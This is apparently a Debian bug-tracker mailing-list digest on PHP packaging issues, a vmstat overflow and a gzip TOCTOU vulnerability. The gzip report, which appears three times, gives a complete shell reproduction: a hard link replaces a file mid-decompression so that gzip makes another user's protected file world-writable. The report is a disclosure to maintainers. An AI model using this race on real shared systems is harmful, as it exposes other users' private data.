Bug#445033: upstream 2.0.0 final released, please update
Package: php5-imagick Version: 2.0.0a2-1 Just a note that 2.0.1 is available upstream. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#348499: tls:// urls don't work anymore since last upgrade in testing
This is perhaps due to bug in php4: http://bugs.php.net/bug.php?id=35668 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#344781: Output buffering cannot be turned off with PHP/FastCGI
The bugfix was included in php-5.1.2 and will probably get into php-4.4.3 as well. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#344781: Output buffering cannot be turned off with PHP/FastCGI
Package: php4-cgi Version: 4:4.4.0-4 Severity: wishlist This bug is described at the following URL: http://bugs.php.net/bug.php?id=34429 It is fixed in the php CVS and will be included in next php release. But because it is very simple and greatly enhances php usability it would be great if the fix could be included in next debian package version. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#319523: Acknowledgement (procps: vmstat -p argument stack overflow)
The patch is at the bottom of the vmstat advisory page: http://www.danitrous.org/code/PoCs/vmstat_adv.txt -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#303927: gzip TOCTOU file-permissions vulnerability
Joey Hess wrote: Martin Pitt wrote: cut Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly? I'm a wimp, so I will use gdb instead of writing some real exploit to win the race. It is quite easy to win the race when the file that's being decompressed is big: --- # adduser user-good # adduser user-evil # usermod -G src user-good # usermod -G src user-evil # mkdir /var/www/proj # chown root.src /var/www/proj # chmod 2775 /var/www/proj [EMAIL PROTECTED]:/var/www/proj$ echo Rather secret data secf.txt [EMAIL PROTECTED]:/var/www/proj$ chmod 400 secf.txt [EMAIL PROTECTED]:/var/www/proj$ ls -al secf.txt -r 1 user-good src 19 Apr 14 09:16 secf.txt [EMAIL PROTECTED]:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256 [EMAIL PROTECTED]:/var/www/proj$ gzip bigf.bin [EMAIL PROTECTED]:/var/www/proj$ chmod 666 bigf.bin.gz [EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin.gz -rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz -r 1 user-good src 19 Apr 14 09:16 secf.txt [EMAIL PROTECTED]:/var/www/proj$ cat secf.txt cat: secf.txt: Permission denied [EMAIL PROTECTED]:/var/www/proj$ gzip -d bigf.bin.gz [EMAIL PROTECTED]:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin [EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt [EMAIL PROTECTED]:/var/www/proj$ cat secf.txt Rather secret data --- The time between beginning of decompression and unlink+delete was about 2 sec. and decompression has finished about 7-8 seconds later. The same was tested and applyes to bzip2. Best regards, Theodor -- Theodor Milkov http://www.zimage.del.bg/ CCNA, CCNP, MCP -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#303927: gzip TOCTOU file-permissions vulnerability
Joey Hess wrote: Martin Pitt wrote: cut Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly? I'm a wimp, so I will use gdb instead of writing some real exploit to win the race. It is quite easy to win the race when the file that's being decompressed is big: --- # adduser user-good # adduser user-evil # usermod -G src user-good # usermod -G src user-evil # mkdir /var/www/proj # chown root.src /var/www/proj # chmod 2775 /var/www/proj [EMAIL PROTECTED]:/var/www/proj$ echo Rather secret data secf.txt [EMAIL PROTECTED]:/var/www/proj$ chmod 400 secf.txt [EMAIL PROTECTED]:/var/www/proj$ ls -al secf.txt -r 1 user-good src 19 Apr 14 09:16 secf.txt [EMAIL PROTECTED]:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256 [EMAIL PROTECTED]:/var/www/proj$ gzip bigf.bin [EMAIL PROTECTED]:/var/www/proj$ chmod 666 bigf.bin.gz [EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin.gz -rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz -r 1 user-good src 19 Apr 14 09:16 secf.txt [EMAIL PROTECTED]:/var/www/proj$ cat secf.txt cat: secf.txt: Permission denied [EMAIL PROTECTED]:/var/www/proj$ gzip -d bigf.bin.gz [EMAIL PROTECTED]:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin [EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt [EMAIL PROTECTED]:/var/www/proj$ cat secf.txt Rather secret data --- The time between beginning of decompression and unlink+delete was about 2 sec. and decompression has finished about 7-8 seconds later. The same was tested and applyes to bzip2. Best regards, Theodor -- Theodor Milkov http://www.zimage.del.bg/ CCNA, CCNP, MCP -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#303927: gzip TOCTOU file-permissions vulnerability
Joey Hess wrote: Martin Pitt wrote: cut Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly? I'm a wimp, so I will use gdb instead of writing some real exploit to win the race. It is quite easy to win the race when the file that's being decompressed is big: --- # adduser user-good # adduser user-evil # usermod -G src user-good # usermod -G src user-evil # mkdir /var/www/proj # chown root.src /var/www/proj # chmod 2775 /var/www/proj [EMAIL PROTECTED]:/var/www/proj$ echo Rather secret data secf.txt [EMAIL PROTECTED]:/var/www/proj$ chmod 400 secf.txt [EMAIL PROTECTED]:/var/www/proj$ ls -al secf.txt -r 1 user-good src 19 Apr 14 09:16 secf.txt [EMAIL PROTECTED]:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256 [EMAIL PROTECTED]:/var/www/proj$ gzip bigf.bin [EMAIL PROTECTED]:/var/www/proj$ chmod 666 bigf.bin.gz [EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin.gz -rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz -r 1 user-good src 19 Apr 14 09:16 secf.txt [EMAIL PROTECTED]:/var/www/proj$ cat secf.txt cat: secf.txt: Permission denied [EMAIL PROTECTED]:/var/www/proj$ gzip -d bigf.bin.gz [EMAIL PROTECTED]:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin [EMAIL PROTECTED]:/var/www/proj$ ls -la secf.txt bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt [EMAIL PROTECTED]:/var/www/proj$ cat secf.txt Rather secret data --- The time between beginning of decompression and unlink+delete was about 2 sec. and decompression has finished about 7-8 seconds later. The same was tested and applyes to bzip2. Best regards, Theodor -- Theodor Milkov http://www.zimage.del.bg/ CCNA, CCNP, MCP -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]